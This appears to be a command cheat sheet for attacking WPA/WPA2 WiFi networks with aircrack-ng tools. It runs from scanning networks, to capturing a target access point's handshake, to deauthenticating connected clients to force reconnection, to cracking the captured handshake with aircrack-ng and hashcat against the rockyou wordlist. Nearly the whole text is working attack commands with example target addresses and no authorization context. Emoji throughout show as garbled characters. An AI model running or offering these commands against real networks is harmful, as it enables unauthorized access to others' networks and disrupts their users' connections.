๐ 1. Scan Available WiFi Networks
๐ Scan all nearby WiFi networks
sudo airodump-ng mon0
๐ถ Scan only 2.4 GHz networks (802.11b/g)
sudo airodump-ng --band bg mon0
๐ก Scan only 5 GHz networks (802.11a)
sudo airodump-ng --band a mon0
๐ Band Option Summary
--band aโ 5 GHz (802.11a)--band bโ 2.4 GHz (802.11b)--band gโ 2.4 GHz (802.11g)--band bgโ All 2.4 GHz (recommended)--band abgโ Both 2.4 GHz and 5 GHz
๐ฏ 2. Capture WPA/WPA2 Handshake
๐ฏ Start listening on target AP
# Replace <channel>, <BSSID>, and <output_filename>
sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_filename> mon0
Example
# Capture handshake from AP on channel 36
sudo airodump-ng -c 36 --bssid A0:70:B7:2C:07:70 -w Tenda.captured mon0
๐ This starts focused packet capture. Keep this terminal open!
๐ฅ 3. Force Reconnection with Deauth Attack
๐ Deauth all clients on the target AP
sudo aireplay-ng --deauth 10 -a <BSSID> mon0
๐ฏ Deauth a specific client only
# Replace <BSSID> and <Client_MAC>
sudo aireplay-ng --deauth 10 -a <BSSID> -c <Client_MAC> mon0
Example
# Deauth one device from the AP
sudo aireplay-ng --deauth 10 -a A0:70:B7:2C:07:70 -c 32:6D:90:EC:CF:A0 mon0
๐ Send multiple deauth packets to force reconnect and capture the 4-way handshake.
๐งช 4. Verify and Crack Handshake
๐ Verify handshake with aircrack-ng
aircrack-ng Tenda.captured.cap -w rockyou.txt
๐ If a handshake is captured, it will be shown in the top-right during capture and crackable here.
๐ Convert capture for Hashcat
hcxpcapngtool Tenda.captured.cap -o Tenda.hc22000
๐ Crack handshake with Hashcat
hashcat -m 22000 Tenda.hc22000 rockyou.txt --show